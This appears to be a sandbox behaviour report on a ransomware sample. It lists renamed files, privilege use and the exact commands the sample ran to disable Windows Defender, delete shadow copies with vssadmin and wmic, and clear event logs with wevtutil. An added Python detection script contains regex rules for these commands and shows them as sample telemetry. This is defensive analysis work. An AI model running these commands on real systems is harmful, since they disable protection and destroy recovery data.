| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\jce.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_h_P3hHh55lc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\dropins\README.TXT.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_2AYuo4OFmgw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.common.16.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_i34hTHRddwk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL107.XML.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_DbbBGl8Mznk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_MoveNoDrop32x32.gif.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_qq2dQt6v90Q0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\lib\management\snmp.acl.template.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_TbhbsurI0280.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_OEM_Perp-pl.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_46jjTW_3O680.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_kZVkxwKDDwI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Grace-ppd.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_1XKlntuGei40.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"
C:\Windows\SysWOW64\net.exe
net.exe stop "SamSs" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "vmicvss" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "VSS" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "wbengine" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "WebClient" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UnistoreSvc_12cea" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_12cea" /y
C:\Windows\SysWOW64\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UnistoreSvc_12cea" start= disabled
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
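The command lines above are the sample's pre-encryption chain: it turns Windows Defender off at every layer it can reach from an elevated shell (policy keys, SpyNet cloud reporting, the Defender ETW autologgers, the Defender scheduled tasks, the WdBoot/WdFilter/WdNisDrv/WdNisSvc/WinDefend/SecurityHealthService service Start values set to 4, the definitions removed with MpCmdRun, real-time and IOAV protection disabled with Set-MpPreference), destroys recovery points with vssadmin and wmic, and wipes the System, Security and Application logs with wevtutil. Each command also has a legitimate administrative use, so the detection value is in the combination inside one process tree, not in any single line. The following Python is an added example, not part of this report or of the sandbox's own signature set: it runs a small rule set over process-creation command lines (the kind carried by Sysmon Event ID 1 or Security 4688) and escalates when AV tampering, shadow-copy deletion and log clearing all appear together. The regexes, rule names and severity wording are my assumptions; the ATT&CK IDs are the standard ones for these behaviours (T1562.001 Impair Defenses: Disable or Modify Tools, T1490 Inhibit System Recovery, T1070.001 Clear Windows Event Logs); the sample telemetry is constructed from the report's commands plus three benign look-alikes that must not fire.

```python
import re
from collections import Counter

# Constructed sample telemetry (not collected from a live host): the command lines this report
# records, written as a process-creation event would carry them, plus three read-only uses of
# the same binaries to show the rules stay quiet on ordinary admin activity.
SAMPLE_COMMAND_LINES = [
    r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    r'vssadmin.exe delete shadows /all /quiet',
    r'wevtutil.exe cl security',
    r'wmic.exe shadowcopy delete',
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    r'powershell Set-MpPreference -DisableRealtimeMonitoring $true',
    # benign look-alikes (constructed): querying, not changing, the same objects
    r'reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductName',
    r'schtasks.exe /Query /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan"',
    r'wevtutil.exe qe Security /c:5',
]

# (ATT&CK technique, rule name, pattern). Patterns are case-insensitive and tolerate the optional
# quoting Windows command lines use, and use search() so a "cmd.exe /c" wrapper does not matter.
# Rule names and exact patterns are this example's own choices.
RULES = [
    ("T1562.001", "defender-service-start-disabled",
     re.compile(r'\breg(\.exe)?\s+add\s+"?HKLM\\System\\CurrentControlSet\\Services\\'
                r'(WinDefend|WdBoot|WdFilter|WdNisDrv|WdNisSvc|SecurityHealthService)\b.*'
                r'/v\s+"?Start"?\s+.*?/d\s+"?4"?', re.I)),
    ("T1562.001", "defender-policy-key-written",
     re.compile(r'\breg(\.exe)?\s+add\s+"?HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\', re.I)),
    ("T1562.001", "defender-etw-autologger-disabled",
     re.compile(r'\\WMI\\Autologger\\Defender(Api|Audit)Logger\b.*/v\s+"?Start"?.*?/d\s+"?0"?', re.I)),
    ("T1562.001", "defender-scheduled-task-disabled",
     re.compile(r'\bschtasks(\.exe)?\s+/Change\b.*(Windows Defender|ExploitGuard).*\s/Disable\b', re.I)),
    ("T1562.001", "defender-definitions-removed",
     re.compile(r'\bMpCmdRun\.exe"?\s+-RemoveDefinitions\b', re.I)),
    ("T1562.001", "set-mppreference-disable",
     re.compile(r'\bSet-MpPreference\b.*-Disable\w+\s+\$?true\b', re.I)),
    ("T1490", "vssadmin-delete-shadows",
     re.compile(r'\bvssadmin(\.exe)?\s+delete\s+shadows\b', re.I)),
    ("T1490", "wmic-shadowcopy-delete",
     re.compile(r'\bwmic(\.exe)?\s+shadowcopy\s+delete\b', re.I)),
    ("T1070.001", "wevtutil-clear-log",
     re.compile(r'\bwevtutil(\.exe)?\s+(cl|clear-log)\s+\w+', re.I)),
]


def classify(cmdline):
    """Return [(technique_id, rule_name), ...] for every rule that fires on one command line."""
    return [(tid, name) for tid, name, rx in RULES if rx.search(cmdline)]


def triage(cmdlines):
    """Run the rules over the command lines of one host or one process tree.

    Returns (hits, by_technique): hits lists (cmdline, technique_id, rule_name) for every
    firing rule; by_technique counts distinct command lines per ATT&CK technique."""
    hits = []
    by_technique = Counter()
    for cmd in cmdlines:
        matched = classify(cmd)
        hits.extend((cmd, tid, name) for tid, name in matched)
        for tid in {tid for tid, _ in matched}:
            by_technique[tid] += 1
    return hits, by_technique


def verdict(by_technique):
    """Escalate on the combination, not on a single command.

    A lone vssadmin or wevtutil call is routine for an administrator; AV tampering plus
    recovery-point destruction plus log clearing in one tree is the sequence this sample
    runs before encrypting, and justifies isolating the host."""
    seen = set(by_technique)
    if {"T1562.001", "T1490", "T1070.001"} <= seen:
        return "critical: AV tampering + shadow copy deletion + log clearing in one tree"
    if "T1562.001" in seen or "T1490" in seen:
        return "high: review the process tree"
    if seen:
        return "medium: single suspicious command"
    return "clean"


if __name__ == "__main__":
    hits, counts = triage(SAMPLE_COMMAND_LINES)
    for cmd, tid, name in hits:
        print(f"{tid:<10} {name:<34} {cmd}")
    print(dict(counts), "->", verdict(counts))
```

Feeding the constructed telemetry through `triage` fires nine rules, none of them on the three read-only look-alikes, and `verdict` returns the critical tier because all three techniques are present. In production the batch fed to `triage` should be the command lines of a single process tree or a short time window per host; scoring across a whole estate would let unrelated admin activity combine into a false critical.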
Network
| Country | Destination | Domain | Proto |
| US | 52.109.12.20:443 | | tcp |
| US | 52.109.12.20:443 | | tcp |
Files
memory/2640-115-0x0000000000000000-mapping.dmp
memory/4240-116-0x0000000000000000-mapping.dmp
memory/4076-117-0x0000000000000000-mapping.dmp
memory/2008-118-0x0000000000000000-mapping.dmp
memory/4256-119-0x0000000000000000-mapping.dmp
memory/4288-120-0x0000000000000000-mapping.dmp
memory/4272-121-0x0000000000000000-mapping.dmp
memory/4404-122-0x0000000000000000-mapping.dmp
memory/4384-123-0x0000000000000000-mapping.dmp
memory/4464-124-0x0000000000000000-mapping.dmp
memory/4444-125-0x0000000000000000-mapping.dmp
memory/4344-126-0x0000000000000000-mapping.dmp
memory/4324-127-0x0000000000000000-mapping.dmp
memory/4420-128-0x0000000000000000-mapping.dmp
memory/3800-129-0x0000000000000000-mapping.dmp
memory/4308-130-0x0000000000000000-mapping.dmp
memory/3076-131-0x0000000000000000-mapping.dmp
memory/512-132-0x0000000000000000-mapping.dmp
memory/652-133-0x0000000000000000-mapping.dmp
memory/3260-134-0x0000000000000000-mapping.dmp
memory/1032-135-0x0000000000000000-mapping.dmp
memory/1244-136-0x0000000000000000-mapping.dmp
memory/1508-137-0x0000000000000000-mapping.dmp
memory/1784-138-0x0000000000000000-mapping.dmp
memory/1284-139-0x0000000000000000-mapping.dmp
memory/2348-140-0x0000000000000000-mapping.dmp
memory/2584-141-0x0000000000000000-mapping.dmp
memory/2768-142-0x0000000000000000-mapping.dmp
memory/3156-143-0x0000000000000000-mapping.dmp
memory/3244-144-0x0000000000000000-mapping.dmp
memory/4836-145-0x0000000000000000-mapping.dmp
memory/1148-146-0x0000000000000000-mapping.dmp
memory/4976-147-0x0000000000000000-mapping.dmp
memory/2000-148-0x0000000000000000-mapping.dmp
memory/4960-149-0x0000000000000000-mapping.dmp
memory/4864-150-0x0000000000000000-mapping.dmp
memory/4580-151-0x0000000000000000-mapping.dmp
memory/3196-152-0x0000000000000000-mapping.dmp
memory/4912-153-0x0000000000000000-mapping.dmp
memory/2688-154-0x0000000000000000-mapping.dmp
memory/1060-155-0x0000000000000000-mapping.dmp
memory/884-156-0x0000000000000000-mapping.dmp
memory/1044-157-0x0000000000000000-mapping.dmp
memory/2496-158-0x0000000000000000-mapping.dmp
memory/4788-159-0x0000000000000000-mapping.dmp
memory/924-160-0x0000000000000000-mapping.dmp
memory/2544-161-0x0000000000000000-mapping.dmp
memory/1340-162-0x0000000000000000-mapping.dmp
memory/1516-163-0x0000000000000000-mapping.dmp
memory/1776-164-0x0000000000000000-mapping.dmp
memory/2172-165-0x0000000000000000-mapping.dmp
memory/2020-166-0x0000000000000000-mapping.dmp
memory/2292-167-0x0000000000000000-mapping.dmp
memory/3112-168-0x0000000000000000-mapping.dmp
memory/3836-169-0x0000000000000000-mapping.dmp
memory/1616-170-0x0000000000000000-mapping.dmp
memory/1564-171-0x0000000000000000-mapping.dmp
memory/3844-172-0x0000000000000000-mapping.dmp
memory/1864-173-0x0000000000000000-mapping.dmp
memory/4372-174-0x0000000000000000-mapping.dmp
memory/2192-175-0x0000000000000000-mapping.dmp
memory/4000-176-0x0000000000000000-mapping.dmp
memory/4040-177-0x0000000000000000-mapping.dmp
memory/4092-178-0x0000000000000000-mapping.dmp
memory/3280-179-0x0000000003270000-0x0000000003271000-memory.dmp
memory/3280-180-0x0000000003270000-0x0000000003271000-memory.dmp
memory/3280-181-0x0000000006FE0000-0x0000000007016000-memory.dmp
memory/3280-182-0x0000000004C70000-0x0000000004C71000-memory.dmp
memory/3280-183-0x0000000007650000-0x0000000007C78000-memory.dmp
memory/3280-184-0x00000000075F0000-0x0000000007612000-memory.dmp
memory/3280-185-0x0000000007DF0000-0x0000000007E56000-memory.dmp
